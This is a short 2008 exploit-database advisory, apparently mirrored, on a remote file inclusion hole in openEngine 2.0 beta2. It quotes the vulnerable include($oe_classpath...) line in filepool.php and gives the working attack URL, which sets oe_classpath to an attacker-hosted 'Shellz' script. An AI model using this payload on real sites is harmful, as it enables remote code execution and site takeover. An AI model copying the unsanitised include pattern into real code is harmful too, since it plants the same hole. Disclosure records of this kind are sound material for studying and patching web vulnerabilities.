[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : openEngine 2.0 beta2 Remote File Inclusion Vulnerability
# Published : 2008-09-26
# Author : Crackers_Child
# Previous Title : The Gemini Portal <= 4.7 Insecure Cookie Handling Vulnerability
# Next Title : Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability
**************************************************************************************
Author : By Crackers_Child
Contact: cashr00t@hotmail.com
Greetz : str0ke & All My Friends
**************************************************************************************
Script : openEngine 2. 0 beta2 Remote File include Vulnerable
Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0
**************************************************************************************
Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?
**************************************************************************************
Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)
**************************************************************************************
N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :)
**************************************************************************************
# www.Syue.com [2008-09-26]